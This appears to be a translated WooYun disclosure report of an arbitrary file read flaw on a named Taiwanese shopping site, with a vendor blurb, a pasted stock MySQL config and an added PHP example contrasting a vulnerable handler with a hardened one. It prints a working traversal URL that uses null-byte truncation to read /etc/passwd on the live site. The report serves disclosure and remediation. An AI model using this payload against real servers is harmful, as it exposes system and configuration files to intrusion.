
Vulnerability summary

Defect ID: wooyun-2016-0177488

Title: Arbitrary file traversal/read vulnerability on the OnceOK (万事OK) main WWW site (Taiwan)

Vendor: ONCEOK

Author: 暴走

Submitted: 2016-02-22 09:48

Fix time: 2016-02-27 09:50

Disclosed: 2016-02-27 09:50

Type: arbitrary file traversal/download

Severity: high

Self-assessed Rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-02-22: details sent to the vendor; awaiting the vendor's handling
2016-02-27: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Introduction as seen on the website:
Mingjie International's "OnceOK" (萬事OK) is an affiliate of Anser Digital (安瑟數位), a well-known domestic e-commerce company. Anser has run e-commerce operations since 1998, leads the domestic online shopping sector, has won multiple awards and is well regarded by consumers. To give consumers a comfortable and convenient environment for shopping for gifts and regional specialty products, the "OnceOK" website (http://www.onceok.com.tw) was established. With "OnceOK", you can buy the most authentic fish crisps from Tamsui without taking the MRT there, and buy specialty products from all over Taiwan without taking the high-speed rail. One click on "OnceOK" and everything is OK.
  Unlike other shopping sites that simply post products online and start selling, OnceOK draws on Anser's eight years of e-commerce experience to help hand-picked gift and specialty shops across Taiwan fully digitise their product and store information, and plans to sell specialties from all over Taiwan to the whole world through its far-reaching e-commerce platform. OnceOK is therefore your best choice for selecting gifts, presents and souvenirs.

Detailed description:

Home page of the OnceOK main site (http://www.onceok.com.tw/):

[screenshot: 1.png]

Proof of vulnerability:

Testing confirmed an arbitrary file read vulnerability.
A %00 (null byte) truncation, which cuts off the ".jpg" suffix the script appends, is enough to read system files:
http://www.onceok.com.tw/activities.php?ad=../../../../../../../../../etc/passwd%00.jpg

[screenshot: 2.png]


Viewing the DNS configuration:

[screenshot: 3.png]


Viewing the MySQL configuration file:

[screenshot: 4.png]


# Example MySQL config file for large systems.
#
# This is for a large system with memory = 512M where the system runs mainly
# MySQL.
#
# You can copy this file to
# /etc/my.cnf to set global options,
# mysql-data-dir/my.cnf to set server-specific options (in this
# installation this directory is /var/lib/mysql) or
# ~/.my.cnf to set user-specific options.
#
# In this file, you can use all long options that a program supports.
# If you want to know which options a program supports, run the program
# with the "--help" option.

# The following options will be passed to all MySQL clients
[client]
#password	= your_password
port		= 3306
socket		= /var/lib/mysql/mysql.sock

# Here follows entries for some specific programs

# The MySQL server
[mysqld]
port		= 3306
socket		= /var/lib/mysql/mysql.sock
skip-locking
key_buffer = 256M
max_allowed_packet = 1M
table_cache = 384
table_definition_cache = 384
sort_buffer_size = 1M
read_buffer_size = 4M
read_rnd_buffer_size = 4M
myisam_sort_buffer_size = 64M
thread_cache_size = 8
query_cache_size= 16M
max_connections = 500
max_connect_errors = 10000
wait_timeout = 10
tmp_table_size = 256M
max_heap_table_size = 256M
# Try number of CPU's*2 for thread_concurrency
thread_concurrency = 8

#log-slow-queries = /var/log/mysql-slow.log
#long_query_time = 3
#log-long-format
#log-slow-queries = /var/log/mysql/mysql-slow.log
#long_query_time = 1

skip-innodb

# Don't listen on a TCP/IP port at all. This can be a security enhancement,
# if all processes that need to connect to mysqld run on the same host.
# All interaction with mysqld must be made via Unix sockets or named pipes.
# Note that using this option without enabling named pipes on Windows
# (via the "enable-named-pipe" option) will render mysqld useless!
#
#skip-networking

# Replication Master Server (default)
# binary logging is required for replication
log-bin=mysql-bin

# required unique id between 1 and 2^32 - 1
# defaults to 1 if master-host is not set
# but will not function as a master if omitted
server-id	= 1

# Replication Slave (comment out master section to use this)
#
# To configure this host as a replication slave, you can choose between
# two methods :
#
# 1) Use the CHANGE MASTER TO command (fully described in our manual) -
#    the syntax is:
#
#    CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=,
#    MASTER_USER=, MASTER_PASSWORD= ;
#
#    where you replace , , by quoted strings and
#    by the master's port number (3306 by default).
#
#    Example:
#
#    CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306,
#    MASTER_USER='joe', MASTER_PASSWORD='secret';
#
# OR
#
# 2) Set the variables below. However, in case you choose this method, then
#    start replication for the first time (even unsuccessfully, for example
#    if you mistyped the password in master-password and the slave fails to
#    connect), the slave will create a master.info file, and any later
#    change in this file to the variables' values below will be ignored and
#    overridden by the content of the master.info file, unless you shutdown
#    the slave server, delete master.info and restart the slaver server.
#    For that reason, you may want to leave the lines below untouched
#    (commented) and instead use CHANGE MASTER TO (see above)
#
# required unique id between 2 and 2^32 - 1
# (and different from the master)
# defaults to 2 if master-host is set
# but will not function as a slave if omitted
#server-id = 2
#
# The replication master for this slave - required
#master-host =
#
# The username the slave will use for authentication when connecting
# to the master - required
#master-user =
#
# The password the slave will authenticate with when connecting to
# the master - required
#master-password =
#
# The port the master is listening on.
# optional - defaults to 3306
#master-port =
#
# binary logging - not required for slaves, but recommended
#log-bin=mysql-bin

# Point the following paths to different dedicated disks
tmpdir		= /tmp/
#log-update	= /path-to-dedicated-directory/hostname

# Uncomment the following if you are using BDB tables
#bdb_cache_size = 64M
#bdb_max_lock = 100000

# Uncomment the following if you are using InnoDB tables
#innodb_data_home_dir = /var/lib/mysql/
#innodb_data_file_path = ibdata1:10M:autoextend
#innodb_log_group_home_dir = /var/lib/mysql/
#innodb_log_arch_dir = /var/lib/mysql/
# You can set .._buffer_pool_size up to 50 - 80 %
# of RAM but beware of setting memory usage too high
#innodb_buffer_pool_size = 256M
#innodb_additional_mem_pool_size = 20M
# Set .._log_file_size to 25 % of buffer pool size
#innodb_log_file_size = 64M
#innodb_log_buffer_size = 8M
#innodb_flush_log_at_trx_commit = 1
#innodb_lock_wait_timeout = 50

[mysqldump]
quick
max_allowed_packet = 16M

[mysql]
no-auto-rehash
# Remove the next comment character if you are not familiar with SQL
#safe-updates

[isamchk]
key_buffer = 128M
sort_buffer_size = 128M
read_buffer = 2M
write_buffer = 2M

[myisamchk]
key_buffer = 128M
sort_buffer_size = 128M
read_buffer = 2M
write_buffer = 2M

[mysqlhotcopy]
interactive-timeout
#log-slow-queries=/var/log/mysql_slow_log

Suggested fix:

Fix it as soon as possible.
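Added example (not the site's own code): the handler shape that produces the behaviour shown in the proof above, beside a hardened version that closes it. The file name activities.php, the parameter name ad and the image directory are assumptions; PHP URL-decodes %00 into a NUL byte in $_GET['ad'], and filesystem functions in PHP releases before 5.3.4 stop at that byte, which is why the appended ".jpg" suffix is dropped.

```php
<?php
// Added example, not the site's code. IMAGE_DIR and the "ad" parameter are assumptions.
declare(strict_types=1);

const IMAGE_DIR = '/var/www/html/activities/images'; // assumed image directory

// Vulnerable shape: user input is concatenated into a path and a fixed extension is
// appended. On PHP < 5.3.4 a NUL byte in $ad terminates the C string inside the
// filesystem call, so ".jpg" is never seen and "../../../etc/passwd" is what gets read.
function readAdImageVulnerable(string $ad)
{
    return @file_get_contents(IMAGE_DIR . '/' . $ad . '.jpg');
}

// Hardened version: accept only a plain basename, resolve the canonical path, and
// serve the file only if it still lives inside IMAGE_DIR with the expected extension.
function readAdImageSafe(string $ad): ?string
{
    // Letters, digits, dash and underscore only: no "/", no ".", no NUL, bounded length.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $ad)) {
        return null;
    }
    $base = realpath(IMAGE_DIR);
    $path = realpath($base . '/' . $ad . '.jpg');
    if ($base === false || $path === false) {
        return null; // directory missing or file does not exist
    }
    // realpath() collapses ".." and follows symlinks, so a prefix check on the
    // canonical path catches both traversal and a symlink pointing outside the tree.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // A symlink inside IMAGE_DIR could still point at a non-image file.
    if (strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'jpg') {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

// Request entry point: the payload from the report fails the regex alone.
$img = readAdImageSafe((string) ($_GET['ad'] ?? ''));
if ($img === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: image/jpeg');
echo $img;
```

Keeping the web server's PHP process unable to read files outside the document root (filesystem permissions or open_basedir) limits what any remaining traversal can expose.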

Copyright notice: reprints must credit the source, 暴走@乌云


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored)

Ignored at: 2016-02-27 09:50

Vendor reply:

Vulnerability Rank: 4 (WooYun assessment)

Latest status:

None